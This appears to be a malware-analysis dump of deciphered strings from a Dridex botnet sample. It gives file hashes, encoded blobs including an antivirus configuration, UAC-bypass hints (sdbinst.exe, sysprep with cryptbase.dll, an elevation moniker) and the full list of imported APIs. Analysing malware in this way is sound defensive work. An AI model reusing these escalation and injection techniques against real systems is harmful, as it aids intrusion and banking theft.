68F81F7F2D7E5D0C4830C3D6FAD8F1381D8D79FB2D6E6836BF5D1A3B15A6F6E7810DF4DEA56182F1B75FD9CC38616113CE37B123A75A3FB67E60DF2C29C89D6FCEC3DEB0DAD5ECA48F0F4966CFDEBF10BAE76ED2577A02434E25A597FB473535C4F5BF7B783784AABD9CB6F491A6DA8B00498FD4F0A791B1FF79ABDBBA4A26DD8672AFD74667EFBEFB8A9EA406063DB21C1352ED1A7869F8ECA3EEB5744C84B6772F266D2AE7BF2BC436DA688F9BAF9CAB6E9370BF8C6018B1F55C88ED15A8E4E74D9F4324DA5F6241F7AE7E0DE05D4CAF83AE0CCFFCEB7A1C47796013D1C16F314B17EBBF4E2D2EF54B89FD9E1B94400072E88B7469C5D2F0D9C892625C582E53A96760096B857E8FA51BBCE98DF4150467F0358C660AF1AFB44AA20A7324892A334786CF450F734853E0A6317FFDA0A71927122CF3AEED3741A1A8CAABDDCF0C094DD03E2A74A64EC86E2689D5CA6D77ABFFF7C0FA97186831037840ADF0EEB61309B8AA65FF1628B8B7ED3C3F5ED66AE9711DA38BF0CA6AF768F352E71F392D57D5B3989E10FC4513DB3594120988FDC361AFE9F4741087F1CC58E1F3D5E1D5660D46A24C2B7B9B8138A2DB4A0E57CDDCD0AE3DFBCA2F3A9C7CDD69A915F57DB467627478DF604177CD2A2F83B52B105F8751ADB9D8B3C1EF4FF4FEAFE20BA94634F0918DD04810431A7E3CD42882CE9BB365B4C94785521FDBFE77006E9B1D3E78FE4452B2F5830AE0CBBF664BF44DF70E5B6AD8701516BCBD1D84A746A83ADE1CDA933C8EA800D5A76038C3CB940E25A38DF4867516CAB4301BDC3B564637341F3D971A765F0EE3F15308B1F3487E3BB32C921301FCD014DAB001F2C23FB93F57D1D58152821694A7347F02F5BE2ACF16AA63AD17B061DFF253FBD71306ABF40124A6E87ED148CE005F94D5EA11E094EC0D6620415BBB87FE7BAE8D947A5CE23B2BB8944F95C627DF07E909018C6D579C012DA69526A9EB92AF2F1CAA39035BA877A4C26CFEA25A310FBD81F0FBB0237CAC19D012F09891208848AE4338F530CD59C0730E46A36A40EF5D7FFF8BBF4EE95236C77F442F7633F46A76ADB1767CDC18CE7BF8E2F42C20E213A189478F2D3CFA6628C4C770F56C05BB6C7D4EC886CAFCA019DAAD72B1FA2A4C92D1EADD5F8A318095F8328A3B30120980E2AB6410DE9C927AE8CA86E0758BAE1576AC04038B863A97AFCB08E9179F85506DAC60F28461E958F7F74CE15DE69D56D18FA679A9C6217880315EAC50F43365ABA394BDD6BB0527363B610A43CC5B204070BB7F8656A7B3559CC841920F4791A6DE0A4A6A883284827A5393A18DDC1967F58C3B3168CA8E260B7B2D909B76161EF63228D6BD24D942F1DA98B236CE57700688F44843B4EE8EAD945C254ABDAF6D1670CBE3A183773691F5531630A8091C9606F8F9F17DB44EE9551F942E030EADCBBEE8C381BB529737F14E2EEBD4CC4F7FD1B3BB6D41918FD864F530EF867F5FA3CBAC423821C4CE7C476572BB2D033032DD54F2513518C37127148E1C6FDE5A6BE01FDA2C760398839A901CD78E7DF612C1D1849779AE8B9051A2AAEAF44ED281127783EBF7DABF188A6232217A9F01307D3E5356E29A63C323BCF6AA53C10C1FA03CFE29576947D1F68E2EEA6BF0E8F7276325E69A0A52900E0F00F335B57C2D4900999DA16188D2E393FB17CF9059FD022F2753DEB8E9E4D273419C5BC57D9BCD502D893670DF9B5A535EEAC18F423A350BE97748DCACC57B149F6D89899E5294B150E9904042AE51F538CFC5E112429F56024422D611DF888601E42D65604FE5F9FF31F7AC3A31D269F38ED65330C178E0DC6376F87711064D9AF275A590B7348E18533E4FC52DF97457DEF22B47E8A303C8C19CFAD54C47746E1ECE8A6B2FFE4D81CBA6C46D4F9999D37358020FF024F9A4AC915C40801F03987544EB2D377A58F9F97E3B44D78EC3B392D93AE7F4FBE092A0BCB9D06DB041FF448A1D71047BA80A8F6F5E502030BC0D09746F5CEA0B2688EE4E13184196DE7BB32F57CAE31C97778F6B8943A10C9EBDB37385AA7A8AD53D659BD69121075FDEF85684BA69166FD3F91B7E6FE09C3A9B2B9DEECA38DE9F962021A661CDB9E798B5ED2A70D5F738C8C19C042127A7D509E4FB6F4EF7EE4B15663E4CF0F6F7F05DB0C2A10F2B4650FF6CF07640B3587BD7635B47967C5816C61130B30887B3577718505A67CA2A153A01F6739D061BFCD8B798CE8EE332DA2D1FEB886D11F5D4AE4950E8B9FF24C4AA0F97E8BE0115E8DA6F2F8AF3E5BC99298A76F4D620229C4A23E321C877D69481A3BEC90B30F9CEC08A387E4AE793B66DBCB0CE9B153D3A2439D6F1AF8247721FEFF4F6F25003DA2040C6C97282026F04FECC061248A067D9D8F9478220377DF61E23549684D32428DC52C92506FECB2F13CAE5D91F8F8478BE4C544CE37BF6C109C84CE8D6B274FFB5F952E7989E9FE57F21C0DF2F8CD187795ADF28DEF82DDCF7A727DADA145126E08A3AF446D2703C232815CB1A2F51B75477A02E4CD648B885996AAC2C029788FB1991E65855615AC3A4C660ECC3B8ED81C68520EB26BEEAFF7C8EB78B4CED5E46E4F0D24C71FEDBDA3B9D95C99DF0B1F346D767955C4A7117888AA54E1104F23B68E3F0B7F4B616CB89611CBF7D831300B3596D31A82FA7DBAD247C01D909D4A1060F7193ECC8 40 15BD8DF1CF68952A618DA1AE82BBCE99F27C897605763FC37B53B5CEAFD12CF340E4A08F5AEBC540D5D4E71B9A22A0E7F21346A6B6061BF4474A1F9EDD5C7A8BA057F506F6C74AC031CC61850161C9E7F2455148409F392F072F8C40B495C76BDA48424D977381C05884DB2DF83CFB832D56CDC874B3C50A25B7281688F66AFAD1166632842AB471F25DF69AD3C8C769CDC83CBAA2A5D79C81A817A09E0DF4D8D1C68DE77C4356FF371442299EC4AC957CEEEB2F4BCB9D2285A6B542734986D86A9A3449B46FD64636FE4894DD38E55B142B3AD6EAAD6F93E9162ADC47E963F9FF1D60CB9CFB5B970469327A8D3107B2D6549D4737B8E4C46F937FA4234325C880A9 41 2300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023000D000A0023002000240041005600240043004F004E00460049004700550052004100540049004F004E00240049004E0049000D000A002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023000D000A002300200054006800690073002000660069006C006500200068006100730020006200650065006E002000630072006500610074006500640020006100750074006F006D00610074006900630061006C006C0079002E000D000A002300200044004F0020004E004F00540020004D004F004400490046005900210021000D000A002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023000D000A000D000A005B00430046004700500052004F00460049004C0045005D000D000A000D000A005B0043004F004D004D004F004E005D000D000A000D000A005B005300430041004E004E00450052005D000D000A004200650066006F007200650041006300740069006F006E0054006F00510075006100720061006E00740069006E0065003D0030000D000A0042006F006F007400730065006B0074006F007200530074006100720074003D0030000D000A004D006100730074006500720042006F006F00740053006500630074006F00720073003D0030000D000A004E006F004E00650074004400720076003D0030000D000A005000720069006D0061007200790041006300740069006F006E0046006F00720049006E006600650063007400650064003D0035000D000A005300630061006E0041006300740069006F006E004D006F00640065003D0030000D000A005300630061006E0041006C006C00460069006C00650073003D0030000D000A005300630061006E0041007200630068006900760053006D0061007200740045007800740065006E00730069006F006E0073003D0031000D000A005300630061006E00410072006300680069007600650043007500740052006500630075007200730069006F006E00440065007000740068003D0031000D000A005300630061006E0041007200630068006900760065004500780063006C007500640065003D000D000A005300630061006E00410072006300680069007600650052006500630075007200730069006F006E00440065007000740068003D00320030000D000A005300630061006E0041007200630068006900760065005300630061006E003D0030000D000A005300630061006E0043006800650063006B00530079007300740065006D00460069006C00650073003D0030000D000A005300630061006E00440069006600660045007800740065006E00730069006F006E003D000D000A005300630061006E00480065007500720069007300740069006300460069006C0065003D0031000D000A005300630061006E00480065007500720069007300740069006300460069006C00650045006E00610062006C00650064003D0030000D000A005300630061006E004800650075007200690073007400690063004D006100630072006F0045006E00610062006C00650064003D0030000D000A005300630061006E0049006E007400650072006100630074006900760065004D006F00640065003D0031000D000A005300630061006E005000720069006F0072006900740079003D0031000D000A005300630061006E00520065006700690073007400720079003D0030000D000A005300630061006E005200650070006F00720074004C006500760065006C003D0030000D000A005300630061006E0052006F006F0074006B006900740073003D0030000D000A005300630061006E0053006B00690070004F00660066006C0069006E006500460069006C00650073003D0030000D000A005300630061006E0053006B0069007000520065007000610072007300650050006F0069006E0074003D0031000D000A005300650063006F006E00640061007200790041006300740069006F006E0046006F00720049006E006600650063007400650064003D0035000D000A00530068006F0077005700610072006E0069006E0067004D0065007300730061006700650073003D0030000D000A00530074006F00700041006C006C006F007700650064003D0031000D000A0055007300650050006500720066006F0072006D0061006E00630065005300630061006E003D0030000D000A000D000A005B0053004B0049005000460049004C00450053005D000D000A00500061007400680030003D0043003A005C00500072006F006700720061006D002000460069006C00650073002000280078003800360029000D000A00500061007400680031003D0063003A005C00700072006F006700720061006D002000660069006C00650073005C000D000A00500061007400680032003D0043003A005C00500072006F006700720061006D0044006100740061005C000D000A00500061007400680033003D0063003A005C00770069006E0064006F00770073000D000A000D000A005B00470055004100520044005D000D000A004100720063004D0061007800460069006C00650063006F0075006E0074003D00310030000D000A004100720063004D006100780052006100740069006F003D003200350030000D000A004100720063004D006100780052006500630075007200730069006F006E003D0031000D000A004100720063004D0061007800530069007A0065003D0031003000300030000D000A004100720063005300630061006E003D0030000D000A004700750061007200640044006500610063007400690076006100740065006400420079005700530043003D0030000D000A004D006100630072006F00560069007200750073004800650075007200690073007400690063003D0030000D000A004D006100780069006D0075006D004C006F006700460069006C006500530069007A0065003D0030000D000A004F006E004100630063006500730073004200610063006B00750070004C006F0067003D0030000D000A004F006E00410063006300650073007300430061006300680065004E006500740077006F0072006B004100630063006500730073003D0031000D000A004F006E004100630063006500730073004500780063006C00750064006500500072006F0063006500730073004E0061006D00650073003D000D000A004F006E004100630063006500730073004500780063006C007500640065006400500072006F00630065007300730030003D006500780070006C006F007200650072002E006500780065000D000A004F006E004100630063006500730073004500780063006C007500640065006400500072006F00630065007300730031003D0073006400620069006E00730074002E006500780065000D000A004F006E004100630063006500730073004500780063006C007500640065006400500072006F00630065007300730032003D00730070006F006F006C00730076002E006500780065000D000A004F006E004100630063006500730073004500780063006C007500640065006400500072006F00630065007300730033003D0073007600630068006F00730074002E006500780065000D000A004F006E004100630063006500730073004500780063006C007500640065006400500072006F00630065007300730034003D00770069006E006C006F0067006F006E002E006500780065000D000A004F006E0041006300630065007300730045007800740065006E00730069006F006E004C006900730074003D000D000A004F006E00410063006300650073007300460069006C0065004500780063006C007500730069006F006E0043006F0075006E0074003D0031000D000A004F006E004100630063006500730073005300630061006E0041006C006C00460069006C00650073003D0030000D000A004F006E004100630063006500730073005300630061006E004C006F00630061006C004400720069007600650073003D0031000D000A004F006E004100630063006500730073005300630061006E004E006500740077006F0072006B004400720069007600650073003D0030000D000A004F006E004100630063006500730073005700720069007400650043006F006E0066006900670054006F004C006F0067003D0030000D000A00500061007400680030003D0063003A005C000D000A005200650070006F007200740069006E0067004C006500760065006C003D0030000D000A005500730065004500760065006E0074006C006F0067003D0030000D000A00550073006500570068006900740065006C006900730074005300650072007600650072003D0030000D000A00570069006E00330032004800650075007200690073007400690063003D0030000D000A00570069006E00330032004800650075007200690073007400690063004D006F00640065003D0031000D000A000D000A005B0050004F005000330043004F004E004600490047005D000D000A000D000A005B00530045004E0044004D00530047005D000D000A000D000A005B005500500044004100540045005D000D000A0043006C006F007300650043006F006E006E0065006300740069006F006E003D0031000D000A00440055004E0043006F006E006E0065006300740069006F006E003D002A00440055004E002A00570049004E002A0043004F004E004E004500430054002A000D000A00440055004E00500068006F006E00650062006F006F006B003D000D000A004400690061006C00550070004C006F00670069006E003D000D000A004400690061006C0055007000500061007300730077006F00720064003D000D000A0044006F0077006E006C006F00610064004C006F0063006100740069006F006E003D0031000D000A00500072006F0064007500630074005500700064006100740065004D006F00640065003D0030000D000A000D000A005B0056004400460043004800450043004B005D000D000A000D000A005B004500560045004E0054004C004F0047005D000D000A000D000A005B005200450050004F005200540053005D000D000A000D000A005B00570045004200470055004100520044005D000D000A000D000A005B004200410043004B00550050005D000D000A000D000A005B0057004D0049005D000D000A000D000A005B0048004900500053005D000D000A005B004D0041004E0041004700450044004600490052004500570041004C004C005D000D000A004600690072006500770061006C006C0043006F006E00660069006700750072006100740069006F006E003D007B0022006D0061006E0061006700650064004600690072006500770061006C006C00220020003A0020007B0022007000750062006C0069006300220020003A0020007B00220073007400610074006500220020003A00200031002C0022006E006F007400690066007900220020003A00200031002C00220062006C006F0063006B0049006E00220020003A00200030007D002C0022007000720069007600610074006500220020003A0020007B00220073007400610074006500220020003A00200031002C0022006E006F007400690066007900220020003A00200031002C00220062006C006F0063006B0049006E00220020003A00200030007D007D007D000D000A00 42 Global\ 43 Starting path:
Third strings block :
Deciphered strings (3/5) of Dridex Botnet 120 Malware ----------------------------------------------------- Date... : June 08, 2015 MD5.... : 7AC7416FCAB7745F9000EA3E281C8318 SHA256. : BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D Offsets : 0x40DB40-0x40DCEF (PE file offsets : 0xCB40-0xCCEF) Count String 0 LOCALAPPDATA 1 S:(ML;;NW;;;LW) 2 Low\%s 3 .sdb 4 .bat 5 open 6 sdbinst.exe 7 iscsicli.exe 8 /q "%s" 9 \System32\ 10 \SysWOW64\ 11 GET 12 POST 13 sysprep 14 cryptbase.dll 15 Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
Imports functions names :
Deciphered strings (4/5) of Dridex Botnet 120 Malware ----------------------------------------------------- Date... : June 08, 2015 MD5.... : 7AC7416FCAB7745F9000EA3E281C8318 SHA256. : BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D Offsets : 0x40DCF0-0x40F257 (PE file offsets : 0xCCF0-0xE257) DLL_ID Function_name 001 LoadLibraryA 001 LoadLibraryW 001 GetProcAddress 001 AllocConsole 001 CancelIoEx 001 CloseHandle 001 CompareStringA 001 CompareStringW 001 CreateDirectoryW 001 CreateEventA 001 CreateFileMappingW 001 CreateFileA 001 CreateFileW 001 CreateMutexA 001 CreateProcessW 001 CreateRemoteThread 001 CreateThread 001 CreateToolhelp32Snapshot 001 DeleteFileA 001 DeleteFileW 001 DeviceIoControl 001 DisableThreadLibraryCalls 001 DuplicateHandle 001 ExitProcess 001 ExitThread 001 ExpandEnvironmentStringsA 001 ExpandEnvironmentStringsW 001 FileTimeToDosDateTime 001 FileTimeToLocalFileTime 001 FileTimeToSystemTime 001 FindClose 001 FindFirstFileA 001 FindFirstFileW 001 FindNextFileA 001 FindNextFileW 001 FreeConsole 001 FreeLibrary 001 GetCommandLineW 001 GetCurrentProcess 001 GetCurrentProcessId 001 GetCurrentThread 001 GetCurrentThreadId 001 GetDriveTypeW 001 GetEnvironmentVariableA 001 GetEnvironmentVariableW 001 GetExitCodeProcess 001 GetExitCodeThread 001 GetFileAttributesW 001 GetFileInformationByHandle 001 GetFileSize 001 GetLastError 001 GetLocalTime 001 GetLogicalDrives 001 GetModuleFileNameA 001 GetModuleFileNameW 001 GetModuleHandleA 001 GetModuleHandleW 001 GetProcessHeap 001 GetShortPathNameA 001 GetShortPathNameW 001 GetStartupInfoW 001 GetStdHandle 001 GetSystemDirectoryW 001 GetSystemInfo 001 GetSystemTime 001 GetSystemTimeAsFileTime 001 GetTempFileNameA 001 GetTempFileNameW 001 GetTempPathW 001 GetThreadPriority 001 GetTickCount 001 GetVersionExW 001 GetWindowsDirectoryW 001 GlobalLock 001 GlobalUnlock 001 HeapCreate 001 HeapDestroy 001 HeapAlloc 001 HeapFree 001 HeapReAlloc 001 IsBadReadPtr 001 IsDebuggerPresent 001 IsProcessorFeaturePresent 001 IsWow64Process 001 LocalAlloc 001 LocalFree 001 MapViewOfFile 001 MultiByteToWideChar 001 OpenEventA 001 OpenMutexA 001 OpenProcess 001 OpenThread 001 OutputDebugStringA 001 PeekConsoleInputA 001 Process32FirstW 001 Process32NextW 001 QueryDosDeviceW 001 QueryPerformanceCounter 001 QueryPerformanceFrequency 001 ReadConsoleInputA 001 ReadFile 001 ReadProcessMemory 001 ReleaseMutex 001 RemoveDirectoryW 001 ResetEvent 001 ResumeThread 001 SetEvent 001 SetFileAttributesA 001 SetFileAttributesW 001 SetFilePointer 001 SetFileTime 001 SetLastError 001 SetThreadPriority 001 Sleep 001 SystemTimeToFileTime 001 SuspendThread 001 TerminateProcess 001 TerminateThread 001 TlsAlloc 001 TlsFree 001 TlsGetValue 001 TlsSetValue 001 Thread32First 001 Thread32Next 001 UnmapViewOfFile 001 VirtualAlloc 001 VirtualAllocEx 001 VirtualFree 001 VirtualFreeEx 001 VirtualProtect 001 VirtualQuery 001 WaitForMultipleObjects 001 WaitForSingleObject 001 WideCharToMultiByte 001 WriteConsoleA 001 WriteFile 001 WriteProcessMemory 005 AllocateAndInitializeSid 005 CloseServiceHandle 005 ConvertStringSecurityDescriptorToSecurityDescriptorW 005 CryptAcquireContextW 005 CryptCreateHash 005 CryptDecrypt 005 CryptDestroyHash 005 CryptDestroyKey 005 CryptEncrypt 005 CryptExportKey 005 CryptGenKey 005 CryptGenRandom 005 CryptGetHashParam 005 CryptGetUserKey 005 CryptHashData 005 CryptImportKey 005 CryptReleaseContext 005 CryptSignHashW 005 CryptVerifySignatureW 005 EqualSid 005 FreeSid 005 GetSidSubAuthority 005 GetSidSubAuthorityCount 005 GetTokenInformation 005 IsValidSid 005 OpenProcessToken 005 OpenSCManagerW 005 OpenServiceW 005 QueryServiceStatus 005 RegCloseKey 005 RegCreateKeyExA 005 RegDeleteValueA 005 RegEnumKeyA 005 RegEnumValueA 005 RegOpenKeyExA 005 RegQueryValueExA 005 RegQueryValueExW 005 RegSetValueExA 011 EnumProcessModulesEx 011 GetModuleBaseNameW 011 GetModuleInformation 011 GetProcessImageFileNameW 002 LdrGetDllHandle 002 LdrGetProcedureAddress 002 NtDuplicateObject 002 RtlComputeCrc32 002 RtlCreateUserThread 002 RtlFillMemory 002 RtlInitUnicodeString 002 RtlMoveMemory 002 RtlZeroMemory 002 RtlQueryElevationFlags 002 NtAllocateVirtualMemory 002 NtFreeVirtualMemory 002 NtProtectVirtualMemory 002 NtReadVirtualMemory 002 NtWriteVirtualMemory 002 NtQueryInformationProcess 002 NtQueryObject 002 NtQuerySystemInformation 002 NtQueryVirtualMemory 009 CommandLineToArgvW 009 SHCreateItemFromParsingName 009 ShellExecuteExW 009 SHGetFolderPathW 007 SHDeleteKeyA 007 StrChrIA 007 StrChrIW 007 StrStrIA 007 StrStrIW 007 StrToIntA 007 StrToIntW 007 StrToIntExA 007 StrToIntExW 007 wvnsprintfA 007 wvnsprintfW 010 CertCloseStore 010 CertEnumCertificatesInStore 010 CertOpenSystemStoreW 010 CryptBinaryToStringA 010 CryptDecodeObject 010 CryptDecodeObjectEx 010 CryptEncodeObject 010 CryptEncodeObjectEx 010 CryptExportPublicKeyInfo 010 CryptImportPublicKeyInfo 010 CryptStringToBinaryA 010 PFXExportCertStoreEx 012 BitBlt 012 CreateCompatibleBitmap 012 CreateCompatibleDC 012 DeleteDC 012 DeleteObject 012 SelectObject 003 __WSAFDIsSet 003 accept 003 bind 003 closesocket 003 connect 003 freeaddrinfo 003 getaddrinfo 003 gethostbyname 003 getsockopt 003 htons 003 ioctlsocket 003 listen 003 ntohs 003 recv 003 select 003 send 003 setsockopt 003 shutdown 003 socket 003 WSAEnumNetworkEvents 003 WSAEventSelect 003 WSAGetLastError 003 WSAGetOverlappedResult 003 WSARecv 003 WSASend 003 WSASetEvent 003 WSASetLastError 003 WSAStartup 004 CallWindowProcW 004 CharLowerA 004 CharLowerW 004 CharUpperA 004 CharUpperW 004 GetClipboardData 004 EnumWindows 004 ExitWindowsEx 004 GetClassNameW 004 GetCursorPos 004 GetDC 004 GetKeyboardState 004 GetSystemMetrics 004 GetWindowTextW 004 GetWindowThreadProcessId 004 MessageBoxA 004 MessageBoxW 004 ReleaseDC 004 SetForegroundWindow 004 SwitchToThisWindow 004 ToUnicode 004 TranslateMessage 008 InternetOpenUrlA 008 InternetOpenUrlW 008 InternetSetStatusCallbackA 008 InternetSetStatusCallbackW 008 InternetOpenA 008 InternetOpenW 008 InternetConnectA 008 InternetConnectW 008 HttpAddRequestHeadersA 008 HttpAddRequestHeadersW 008 HttpOpenRequestA 008 HttpOpenRequestW 008 HttpSendRequestA 008 HttpSendRequestW 008 InternetQueryOptionA 008 InternetQueryOptionW 008 InternetSetOptionA 008 InternetSetOptionW 008 HttpQueryInfoA 008 HttpQueryInfoW 008 InternetQueryDataAvailable 008 InternetReadFile 008 InternetReadFileExA 008 InternetReadFileExW 008 InternetCloseHandle 006 FCIAddFile 006 FCICreate 006 FCIDestroy 006 FCIFlushCabinet 013 SCardEstablishContext 013 SCardGetStatusChangeW 013 SCardListReadersW 013 SCardReleaseContext 014 WTSEnumerateSessionsW 014 WTSFreeMemory 014 WTSQueryUserToken 015 CoCreateInstance 015 CoGetObject 015 CoInitialize 015 CoUninitialize 004 GetWindowLongW 004 SetWindowLongW
And lastly, Imports modules ID and names :
Deciphered strings (5/5) of Dridex Botnet 120 Malware ----------------------------------------------------- Date... : June 08, 2015 MD5.... : 7AC7416FCAB7745F9000EA3E281C8318 SHA256. : BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D Offsets : 0x40F258-0x40F3CB (PE file offsets : 0xE258-0xE3CB) DLL_ID DLL_Name 0 - 1 kernel32.dll 2 ntdll.dll 3 ws2_32.dll 4 user32.dll 5 advapi32.dll 6 cabinet.dll 7 shlwapi.dll 8 wininet.dll 9 shell32.dll 10 crypt32.dll 11 psapi.dll 12 gdi32.dll 13 WinSCard.dll 14 wtsapi32.dll 15 ole32.dll